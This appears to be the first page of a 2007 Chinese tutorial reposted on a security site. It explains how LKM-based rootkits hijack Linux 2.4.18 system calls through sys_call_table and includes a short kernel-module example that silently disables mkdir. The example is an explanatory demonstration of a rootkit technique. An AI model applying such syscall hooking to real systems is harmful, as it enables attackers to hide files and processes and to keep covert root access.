Linux2.4.18内核下基于LKM的系统调用劫持
日期:2007年8月29日 作者:-
Linux现在使用是越来越多了,因此Linux的安全问题现在也慢慢为更多人所关注。Rootkit是攻击者用来隐藏踪迹和保留root访问权限的工具集,在这些工具当中,基于LKM的rootkit尤其受到关注。这些rootkit可以实现隐藏文件、隐藏进程、重定向可执行文件,给linux的安全带来很大的威胁,它们所用到的技术主要是系统调用劫持。用LKM技术截获系统调用的通常步骤如下:
找到需要的系统调用在sys_call_table[]中的入口(参考include/sys/syscall.h)
保存sys_call_table[x]的旧入口指针。(x代表所想要截获的系统调用的索引)
将自定义的新的函数指针存入sys_call_table[x]
在Linux2.4.18内核以前,可以将sys_call_table导出来直接使用。因此修改系统调用非常容易,下面看一个例子:
extern void* sys_call_table[];/*sys_call_table被引入,所以可以存取*/
int (*orig_mkdir)(const char *path); /*保存原始系统调用的函数指针*/
int hacked_mkdir(const char *path)
{return 0; /*一切正常,除了新建操作,该操作什么也不做*/
}
int init_module(void) /*初始化模块*/
{orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
return 0;
}
void cleanup_module(void) /*卸载模块*/
{sys_call_table[SYS_mkdir]=orig_mkdir; /*恢复mkdir系统调用到原来的那个*/
}
- [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] 下一页
-
- Linux2.4.18内核下基于LKM的系统调用劫持 相关文章:
- ·Linux操作系统介绍
- ·VB+Access设计图书管理系统
- ·Linux学习手册
- ·怎么用虚拟光驱装系统?
- ·电脑高手必备 Windows系统35招实用技巧
- ·linux知识大全
- ·Linux主要shell命令详解
- ·Linux操作系统源代码详细分析
- Linux2.4.18内核下基于LKM的系统调用劫持 相关软件
- ·VMware Workstation 6.5 Build 91182 Beta for Linux
- ·影楼电子相册制作系统 2009 2.0 家庭版
- ·东方证券金典版行情系统 V5.68
- ·Vista自带系统小游戏全集
- ·垃圾文件清理系统 V1.51
- ·《雅奇MIS》可视化自动编程系统 V10.0
- ·机动车驾驶员模拟考试系统 v6.95 单机版
- ·方寸天地彩色名片制作系统 V1.2
- 特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作
- 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转
- 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源:http://www.hackhome.com
上一篇:Python是垃圾?
下一篇:sas应用程序外部执行配置